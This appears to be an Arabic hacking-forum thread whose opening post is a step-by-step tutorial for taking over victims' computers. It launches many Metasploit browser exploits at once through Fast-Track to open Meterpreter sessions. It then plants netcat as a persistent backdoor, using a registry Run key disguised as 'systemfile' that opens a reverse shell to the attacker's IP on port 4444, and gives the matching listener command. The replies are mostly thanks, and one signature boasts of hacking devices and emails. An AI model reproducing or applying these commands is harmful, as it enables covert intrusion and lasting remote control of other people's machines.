[للمحترفين] الاختراق بمعظم ثغرات المتصفح + مفاجئة

[للمحترفين] الاختراق بمعظم ثغرات المتصفح + مفاجئة


النتائج 1 إلى 8 من 8

الموضوع: [للمحترفين] الاختراق بمعظم ثغرات المتصفح + مفاجئة

  1. #1

    Thumbs up [للمحترفين] الاختراق بمعظم ثغرات المتصفح + مفاجئة

    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله وبركاته ..

    كيف حالك اعضاء منتديات جيوش الهكر وجدتت لكم اليوم في موقع اجنبي شرح لــــ

    بعض ثغرات المتصفح وراح نستخدم الادوات :

    M3tasploit , Fast-track

    ندخل في صلب الموضوع ..

    طبعا المكتوب واضح من عنوانه ..

    راح نستخدم اداة الفاست تراك في تطبيق هجوم الـ Client-side

    طيب ممكن واحد يسأل شو يعني ؟


    باختصار شديد .. هو تجميع اكبر عدد ممكن من الاكسبلويتات الموجودة بالميتاسبلويت في وقت واحد و في ايفريم واحد على سيرفر محلي ..

    طيب ندخل على التيرمنال .. بوضعية الجذر

    و نكتب الامر لدخول مجلد الفاست تراك



    كود:
    cd/pentest/exploits/fasttrack

    لو تستعرض الملفات الموجودة بالمجلد .. بتلقى سكربت الفاست تراك بلغة البايثون ..

    طيب نشغله بالامر ..



    كود:
    ./fast-track.py -i

    (-i) تعني تشغيل السكربت داخل التيرمنال ..

    الان بيطلع لنا عدة خيارات ممكن تنفذها .. و كل مهمة لها رقم محدد ...


    هجومنا المطلوب اسمه (Mass Client-Side Attack ) و رقمه (4) .. يعني نحدده بالرقم (4)

    من ثم بيطلب منك السكربت وضع الاي بي اللي راح يكون سيرفر للتنصت عليه ( الاي بي تبعك طبعا )

    من ثم بيعرض لك 4 بايلودات تختار منها اللي تبي .. يفضل (Meterpreter) لان راح نستخدمه بعد شوي لسهولته ..

    ثم بيسالك اذا تبي تعمل ارب بويزنينج اطلب منه لا ..

    الان الاداة تقوم بعملها و تجميع الثغرات الممكن و بدأ السيرفر ..

    ننتظر الى ان تنتهي .. بكملة Server started

    بامكانك عمل سبوفينج بالسيرفر (سأقوم بوضع شرح لها قريبا في قسم الثغرات)

    عموما .. الان نفرض لقطنا الضحية بيخبرك ان فيه جلسة جديدة مفتوحة ..

    ندخل لها بالامر


    كود:
    sessions -i 1
    (1) يعني رقم الجلسة ..

    الان امامك الضحية .. و يمكنك تتحكم فيه تحكم كامل

    ------------------------------------------------------------------------------------------------------------------------------------------------------------
    المـــــــــــــــــــــف اجئة

    سأقدم اليوم مفاجأة لأعضاء الجيوش :

    المفاجئة يا طويل العمر
    هي استخدام النت كات كـ Backdoor يتم حقنه بالرجيستري ليتنصت على الاي بي تبعنا داخل مجلد بدء التشغيل ..

    اولا: نرفع النت كات الى على هالمسار داخل جهاز الضحية ..



    كود:
    upload /tmp/nc***** C:\\windows\\system32\\nc*****
    الان ندخل على موجه الاوامر تبع الضحية ..


    كود:
    execute -c -H -f cmd***** -i
    وش السواة الحين ؟

    امر بسيط لحقن مفتاح ريجيستري بهالقيمة .. nc -d -e cmd***** 192.168.1.3 4444

    مع التغيير للاي بي تبعك .. و المقصود بهالامر تنفيذ التنصت خلال بداية التشغيل بوضعية موجه الاوامر ..

    و هذا هو الامر كامل



    كود:
    reg add hklm\software\microsoft\windows\currentversion\run systemfile /t reg_sz /d "nc -d -e cmd***** 192.168.1.3 4444"/
    reg add : واضح .. امر بدائي لاضافة اي مفتاح .

    hklm : و تعني مجلد HKEY_LOCAL_MACHINE .

    /v : و تعني اسم المفتاح و انا هنا موهت بالاسم systemfile

    /t : و تعني نوع المفتاح و في الاغلب يكون reg_sz

    /d : و هنا تتلخص الزبدة تبعنا .. و هي البيانات المطلوبة و هذي بيناتنا n c -d -e cmd***** 192.168.1.3 4444

    الان و بعد زرع المفتاح ..

    نروح للتيرمنال و ونتنصت على البورت 4444 ..


    كود:
    nc -vlp  4444

    و الضحية راح يشبك معك يوميا ..



    وأنا اسف ممكن ايكون الموضوع صعب كثيير على المبتدئين ...


    شرح عملي

    وهذا الفيديو :


    <strong>



    لكم تحياتي ...


  2. #2

    افتراضي رد: [للمحترفين] الاختراق بمعظم ثغرات المتصفح + مفاجئة

    بارك الله فيك على الموضوع الراااائع أخي الكرييم
    تسلم ايدك وسيتم تقييمك

  3. #3

    افتراضي رد: [للمحترفين] الاختراق بمعظم ثغرات المتصفح + مفاجئة

    شرفني مروركم اخي الفاضل ...
    بارك الله فيك ...
    شكرا لك على المرور الرائع ...


  4. #4

    افتراضي رد: [للمحترفين] الاختراق بمعظم ثغرات المتصفح + مفاجئة

    ..........................

  5. #5

    افتراضي رد: [للمحترفين] الاختراق بمعظم ثغرات المتصفح + مفاجئة

    مشكور اخي .

  6. #6

    افتراضي رد: [للمحترفين] الاختراق بمعظم ثغرات المتصفح + مفاجئة

    موضوع في غاية الروعة
    مشكوووور

    يرجى الدعاء لسوريا

  7. #7
    :: مشرف قسم الباك تراك :: الصورة الرمزية يارب رحمتك
    تاريخ التسجيل
    May 2012
    الدولة
    روح العرب
    المشاركات
    1,147

    افتراضي رد: [للمحترفين] الاختراق بمعظم ثغرات المتصفح + مفاجئة

    بارك الله فيك


    youtube

    [ما يلفظ من قول الا لديه رقيب عتيد]
    [ آفعل مآ شئت فكمآ تديُن تدآن ]

    hacker ▎security ▎no Breach>>
    [ mohamed -kareb ]


  8. #8

    افتراضي رد: [للمحترفين] الاختراق بمعظم ثغرات المتصفح + مفاجئة

    مشكؤؤؤؤؤؤر
    إخترآق أجهزة _ إيميلات 100 %
    تشفير _ هيكس _ تلغيم 100 %
    اندكسات _ فرونت بيج 100 %
    إختراق مواقــع 30 %

    #
    تم إعتـزال إختراق الأجهزة والتشفير

    twitter : Ss_pc3

المواضيع المتشابهه

  1. يامشرفين ماهو الاختراق من تغرة المتصفح
    بواسطة سيكا2000 في المنتدى قسم المشاكل والإستفسارات
    مشاركات: 3
    آخر مشاركة: 06-22-2012, 08:07 PM
  2. ادخل و حمل ثغرات المتصفح جاهزة للتلغيم
    بواسطة pSyCh0_3D في المنتدى قسم اختراق الأجهزة
    مشاركات: 8
    آخر مشاركة: 04-03-2011, 02:58 PM
  3. ثغرات المتصفح
    بواسطة angelbeeboo في المنتدى قسم المشاكل والإستفسارات
    مشاركات: 0
    آخر مشاركة: 12-11-2010, 10:43 PM
  4. مشاركات: 8
    آخر مشاركة: 09-05-2010, 11:07 AM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •